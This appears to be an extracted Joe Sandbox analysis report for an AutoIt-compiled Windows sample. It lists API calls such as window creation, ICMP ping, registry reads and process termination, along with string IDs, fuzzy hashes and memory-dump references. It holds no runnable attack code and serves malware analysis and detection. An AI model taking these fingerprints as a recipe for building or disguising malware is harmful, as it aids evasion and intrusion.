• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
• String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
• API String ID: 98802146-2727554177

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 001D34DE
• LoadCursorW.USER32(00000000,00007F00), ref: 001D34ED
• LoadIconW.USER32(00000063), ref: 001D3503
• LoadIconW.USER32(000000A4), ref: 001D3515
• LoadIconW.USER32(000000A2), ref: 001D3527
• LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 001D353F
• RegisterClassExW.USER32(?), ref: 001D3590
  • Part of subcall function 001D3624: GetSysColorBrush.USER32(0000000F), ref: 001D3657
  • Part of subcall function 001D3624: RegisterClassExW.USER32(00000030), ref: 001D3681
  • Part of subcall function 001D3624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001D3692
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D3624: InitCommonControlsEx.COMCTL32(?), ref: 001D36AF
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D3624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001D36BF
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D3624: LoadIconW.USER32(000000A9), ref: 001D36D5
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D3624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001D36E4
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                                                                            • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                                                                                            • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 9229f5b36146f923c8562df1d6035bab5be2ca05b6e186958c1e4a776c7e24fa
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 41618826255464dc0988d1d8bc0e549e7050baac3b322753651f4aba3ed9f2a9
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9229f5b36146f923c8562df1d6035bab5be2ca05b6e186958c1e4a776c7e24fa
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE213E70E00358EFDF119F99FC89B99BFF8FB0A750F00405AE604A6260DBB945488F90

Control-flow Graph
APIs
• WSAStartup.WS2_32(00000101,?), ref: 00251019
• inet_addr.WSOCK32(?), ref: 00251079
• gethostbyname.WS2_32(?), ref: 00251085
• IcmpCreateFile.IPHLPAPI ref: 00251093
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00251123
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00251142
• IcmpCloseHandle.IPHLPAPI(?), ref: 00251216
• WSACleanup.WSOCK32 ref: 0025121C
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
• Opcode ID: 87dddff215615edccfbfacb356a543c7e66f6402083d8bc07676f15b7dbea2dd
• Instruction ID: fbb2792975167552fac8d2362badb71756ae86d44ebbe3a497b78c4c27216fd5
• Opcode Fuzzy Hash: 87dddff215615edccfbfacb356a543c7e66f6402083d8bc07676f15b7dbea2dd
• Instruction Fuzzy Hash: A491C0316146029FD720DF15C888F16BBE0AF48318F14C5A9F969CB7A2C771EDA9CB81

Control-flow Graph

APIs
  • Part of subcall function 001D327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 001D32AF
  • Part of subcall function 001D327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 001D32B7
  • Part of subcall function 001D327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 001D32C2
  • Part of subcall function 001D327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 001D32CD
  • Part of subcall function 001D327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 001D32D5
  • Part of subcall function 001D327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 001D32DD
  • Part of subcall function 001D3205: RegisterWindowMessageW.USER32(00000004,?,001D2964), ref: 001D325D
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 001D2A0A
• OleInitialize.OLE32 ref: 001D2A28
• CloseHandle.KERNEL32(00000000,00000000), ref: 00213A0D
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
• String ID: (&*$0$*$4'*$`K$d(*$$*
• API String ID: 1986988660-3768657815
                                                                                                                                                                                                                                                                                                                            • Opcode ID: f147d20b9c1a32a876de6940f4bd1f8bbac67c247ab04e34f509ea438cf6a02e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 20a27ce990b8b9abbc07beaca4005fa1c6d7e80d05d29e07b5a8cc993d96c515
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f147d20b9c1a32a876de6940f4bd1f8bbac67c247ab04e34f509ea438cf6a02e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 787175B0D26200CF878CEF6DB9AD6157BE4BB6A300390816AE419C7761EF7445898F64
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID: Variable must be of type 'Object'.$t5*$t5*$t5*$t5*$t5*t5*
                                                                                                                                                                                                                                                                                                                            • API String ID: 0-1239982784
                                                                                                                                                                                                                                                                                                                            • Opcode ID: a09a7aead646c62b7ce0bc65e32d1a5b25a1cbdf0cef93d2e961a31bc8027084
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6bcf647172080781b89de8cca285b7eb478d2ad4608eafe48547cfc10b38eeff
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a09a7aead646c62b7ce0bc65e32d1a5b25a1cbdf0cef93d2e961a31bc8027084
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1C28C75E00619DFCB24DF98D880BADB7F1BF19300F25816AE906AB351D771AE52CB90
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 001E15F2
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                                            • String ID: t5*$t5*$t5*$t5*$t5*t5*
                                                                                                                                                                                                                                                                                                                            • API String ID: 1385522511-3675582153
                                                                                                                                                                                                                                                                                                                            • Opcode ID: e129a085a0c1f6cc01b9baeb9e745c1790b25ea7e2f452a262086d7488f416f7
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 29610ab66f270a1568d6a620776d6ee2153ad706527fb642e562f54576da41ce
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e129a085a0c1f6cc01b9baeb9e745c1790b25ea7e2f452a262086d7488f416f7
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0DB29B74A08B81DFCB25CF19D480A2EB7E1BF99300F25495DE9898B351D7B1ED80CB92

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: aacd6885fe114d5255824fa375f1b6a182ec36925814001cc4bcd5c9f654c0fb
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 2b532c32a7cb1bfe714141b67e4a122578f8acb3e68ab6606c20a3fb1be5c2f8
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aacd6885fe114d5255824fa375f1b6a182ec36925814001cc4bcd5c9f654c0fb
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46C1F270A1434AAFDF11DFA8D845BADBBB4AF0A310F044099E556A73D3C77089A2CF61

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 1777 1d35b3-1d3623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001D35E1
                                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 001D3602
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,001D3368,?), ref: 001D3616
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,001D3368,?), ref: 001D361F
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                                                                            • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                                                                            • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 661a5428ba8cadc6112bd05f358e99263b98531232cfbd407b3e585d64663337
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 398775cd839a45b3876dd6f8c8a66d13a396ebb3ea693133f14ff888c40f8545
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 661a5428ba8cadc6112bd05f358e99263b98531232cfbd407b3e585d64663337
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1BF03A71A00298BBEB310B1B7C0CE372EBDD7CBF10F00005EB904A7160CAA91899DAB0

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00215287
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D8577: _wcslen.LIBCMT ref: 001D858A
                                                                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 001D6299
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: Line %d: $AutoIt -
                                                                                                                                                                                                                                                                                                                            • API String ID: 2289894680-4094128768
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 5e7d997c3f420eca324bb9727d3ae4eb63b20ad9ccbd245e5b0d3263b60760a2
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 576ebf60a93abc64847904756b731bb9db682692abeefa27da6063c68b6cc52e
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e7d997c3f420eca324bb9727d3ae4eb63b20ad9ccbd245e5b0d3263b60760a2
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D41C671408304ABC714EB64EC85EEF77DCAFA9320F00456FF99582291EF749649C792

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,?,OV!,0020894C,?,00299CE8,0000000C,002089AB,?,OV!,?,0021564F), ref: 00208A84
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00208A8E
                                                                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00208AB9
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                                                                                                            • String ID: OV!
                                                                                                                                                                                                                                                                                                                            • API String ID: 2583163307-605026659
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 0b264e6ad98595de1d164179469e2c2d4470bbdd99318f7453529454fefb9c5f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 1753e3ec96e96764cb9c08c79563fa77ecaf6edb7edf413ab945d4ebec141c43
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b264e6ad98595de1d164179469e2c2d4470bbdd99318f7453529454fefb9c5f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 03016632B353B01BC7246A34AC8AB3F67498B92734F29021AF954CB5D3DF708CA05D90
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,001D58BE,SwapMouseButtons,00000004,?), ref: 001D58EF
                                                                                                                                                                                                                                                                                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,001D58BE,SwapMouseButtons,00000004,?), ref: 001D5910
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,001D58BE,SwapMouseButtons,00000004,?), ref: 001D5932
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                                            • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                                                                                            • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 001E3006
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                                            • String ID: CALL$bn#
                                                                                                                                                                                                                                                                                                                            • API String ID: 1385522511-4174318473
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetOpenFileNameW.COMDLG32(?), ref: 0021413B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001D55D1,?,?,00214B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 001D5871
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D3A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 001D3A76
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                                                                                                            • String ID: X$`u)
                                                                                                                                                                                                                                                                                                                            • API String ID: 779396738-3107755393
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 001F09D8
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F3614: RaiseException.KERNEL32(?,?,?,001F09FA,?,00000000,?,?,?,?,?,?,001F09FA,00000000,00299758,00000000), ref: 001F3674
                                                                                                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 001F09F5
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                                                                            • String ID: Unknown exception
                                                                                                                                                                                                                                                                                                                            • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00258D52
                                                                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 00258D59
                                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 00258F3A
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 146820519-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 79af7a9eb5ec0c356f782aecdb6d8592116d32bdf921057f3fc070ad15d66691
                                                                                                                                                                                                                                                                                                                            • Instruction ID: bdac23afecba4d190b49c49bbefc135049aa393ea7cf35c7d80b0c1af258b503
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79af7a9eb5ec0c356f782aecdb6d8592116d32bdf921057f3fc070ad15d66691
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3127B71A18301DFC714DF28C484B2ABBE1BF88315F14895EE8899B352DB70E949CF96
                                                                                                                                                                                                                                                                                                                            APIs
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$_strcat
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 306214811-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 001d17faa937d58a5deb311f7cba98cbd039a1c42bb120c75c0d96063aa8a364
                                                                                                                                                                                                                                                                                                                            • Instruction ID: a82a4713f922ed8e30fdb90baa5b604fa453232a6b9ffdc9dee10addfdcee854
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 001d17faa937d58a5deb311f7cba98cbd039a1c42bb120c75c0d96063aa8a364
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66A17931614506EFCB18DF18C5D1969BBB1FF59319B2084AEE80A8F392DB31E995CF84
                                                                                                                                                                                                                                                                                                                            APIs
